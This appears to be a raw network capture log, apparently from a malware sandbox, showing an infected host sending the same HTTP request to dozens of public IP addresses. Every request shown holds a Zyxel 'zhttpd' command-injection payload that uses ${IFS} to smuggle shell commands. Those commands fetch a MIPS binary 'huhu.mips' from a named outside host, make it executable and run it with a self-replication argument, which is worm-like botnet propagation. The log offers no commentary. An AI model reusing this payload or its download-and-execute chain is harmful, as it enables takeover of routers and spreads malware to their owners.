                                      Jan 19, 2024 17:29:39.909754038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6071192.168.2.145817873.48.33.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909776926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6072192.168.2.1456426133.103.132.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909832001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6073192.168.2.1440342129.99.5.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909894943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6074192.168.2.145016052.177.149.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909924984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6075192.168.2.1441192193.136.77.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909986019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6076192.168.2.143529262.183.2.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910011053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6077192.168.2.1460034118.14.93.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910075903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6078192.168.2.145237843.47.94.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910113096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6079192.168.2.1460784186.99.206.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910144091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6080192.168.2.1455262110.46.51.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910197973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6081192.168.2.146091258.125.175.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910247087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6082192.168.2.145315099.222.189.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910298109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6083192.168.2.144555467.192.35.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910330057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6084192.168.2.145582418.13.205.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910367012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6085192.168.2.143446695.77.68.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910404921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6086192.168.2.1441330174.155.208.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910464048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6087192.168.2.1457228178.0.210.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910487890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6088192.168.2.144212887.116.224.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910540104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6089192.168.2.145124841.111.58.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910573959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6090192.168.2.143808051.48.170.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910629034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6091192.168.2.146062643.123.57.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910680056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6092192.168.2.1435328159.216.153.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910713911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6093192.168.2.14493422.3.146.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910767078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6094192.168.2.143358282.86.138.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910820007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6095192.168.2.1448694150.148.144.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910845041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6096192.168.2.145580863.156.53.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910897970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6097192.168.2.146062296.45.107.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910943031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6098192.168.2.144317820.147.237.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.910990000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6099192.168.2.1460768148.43.130.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911029100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6100192.168.2.1448682188.178.3.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911062002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6101192.168.2.145783644.100.44.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911109924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6102192.168.2.145484831.29.136.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911154032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6103192.168.2.143822291.40.21.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911179066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6104192.168.2.144659214.221.58.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911220074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6105192.168.2.1440872217.183.4.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911283970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6106192.168.2.1433214164.225.191.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911303043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6107192.168.2.1452476154.92.47.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911314964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6108192.168.2.1436176146.59.29.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911365032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6109192.168.2.1453702175.29.237.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911422968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6110192.168.2.1456024175.94.211.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911465883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6111192.168.2.1441606188.95.53.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911499023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6112192.168.2.144805268.60.34.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911534071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6113192.168.2.145337837.176.47.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911601067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6114192.168.2.1434328163.144.47.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911618948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6115192.168.2.1443344221.228.113.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911655903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6116192.168.2.14485602.2.135.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911691904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6117192.168.2.143805068.41.150.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911756039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6118192.168.2.1452126118.239.59.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911787033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6119192.168.2.1451968154.84.84.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911808014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6120192.168.2.144454469.2.69.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911839008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6121192.168.2.145086641.188.109.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911881924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6122192.168.2.145095666.30.235.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911928892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6123192.168.2.145181063.150.138.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.911964893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6124192.168.2.1440194165.199.152.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912015915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6125192.168.2.143314852.94.58.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912034035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6126192.168.2.1445302151.110.169.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912066936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6127192.168.2.143970424.77.242.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912091970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6128192.168.2.1456308195.136.177.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912153959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6129192.168.2.1441478213.245.228.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912201881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6130192.168.2.144971051.123.38.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912240982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6131192.168.2.1440274112.83.119.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912293911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6132192.168.2.1460834161.37.41.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912348986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6133192.168.2.1435352217.27.190.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912400007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6134192.168.2.1455056165.233.186.186443
                                      TimestampBytes transferredDirectionData
